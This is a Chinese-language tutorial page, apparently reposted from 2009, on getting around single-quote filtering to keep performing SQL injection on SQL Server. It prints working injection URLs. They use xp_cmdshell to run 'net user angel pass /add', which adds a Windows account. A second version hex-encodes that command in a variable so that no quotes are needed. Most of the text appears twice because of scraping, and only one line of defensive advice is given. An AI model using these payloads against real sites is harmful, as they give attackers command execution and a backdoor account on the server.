SQL注入中繞過 單引號 限制繼續(xù)注入
更新時間:2009年06月27日 21:51:48 作者:
我想不少人都看過一些關于SQL Injection針對SQL Server攻擊的文章,都是因為變量過濾不足甚至沒有過濾而構造畸形SQL語句注入的
包括我寫的那篇《SQL Injection的實現與應用》也是這樣的例子,因為沒有碰到任何的過濾,所以使我們相當輕松就注入成功了,如下:
http://chabaoo.cn/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--
這往往給大家造成誤解,認為只要變量過濾了'就可以防止SQL Injection攻擊,這種意識為大量程序可以注入埋下禍根,其實僅僅過濾'是不夠的,在'被過濾的情況下我們照樣玩,看下面語句:
http://chabaoo.cn/show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--
是不是跟上面的那句有很大區(qū)別?可是效果完全是一樣的。其實這些都是SQL語句。
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
這句是“net user angel pass /add”的16進制格式。了解SQL的朋友就容易明白,先聲明一個變量a,然后把我們的指令賦值給a,然后調用變量a最終執(zhí)行我們輸入的命令。變量a可以是任何命令。如下:
declare @a sysname
select @a=
exec master.dbo.xp_cmdshell @a
解決辦法:
過濾變量,限制只允許輸入特定字符。比如對于數字類型的變量就限制只能輸入數字類型的數據。具體就不說了。這完全是程序作者自由發(fā)揮了。
復制代碼 代碼如下:
http://chabaoo.cn/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--
這往往給大家造成誤解,認為只要變量過濾了'就可以防止SQL Injection攻擊,這種意識為大量程序可以注入埋下禍根,其實僅僅過濾'是不夠的,在'被過濾的情況下我們照樣玩,看下面語句:
復制代碼 代碼如下:
http://chabaoo.cn/show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--
是不是跟上面的那句有很大區(qū)別?可是效果完全是一樣的。其實這些都是SQL語句。
復制代碼 代碼如下:
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
這句是“net user angel pass /add”的16進制格式。了解SQL的朋友就容易明白,先聲明一個變量a,然后把我們的指令賦值給a,然后調用變量a最終執(zhí)行我們輸入的命令。變量a可以是任何命令。如下:
復制代碼 代碼如下:
declare @a sysname
select @a=
exec master.dbo.xp_cmdshell @a
解決辦法:
過濾變量,限制只允許輸入特定字符。比如對于數字類型的變量就限制只能輸入數字類型的數據。具體就不說了。這完全是程序作者自由發(fā)揮了。
相關文章
Asp.net在線備份、壓縮和修復Access數據庫示例代碼
這篇文章主要介紹了Asp.net如何在線備份、壓縮和修復Access數據庫,需要的朋友可以參考下2014-03-03asp.net 使用Silverlight操作ASPNETDB數據庫
asp.net下使用Silverlight操作ASPNETDB數據庫的實現代碼2010-01-01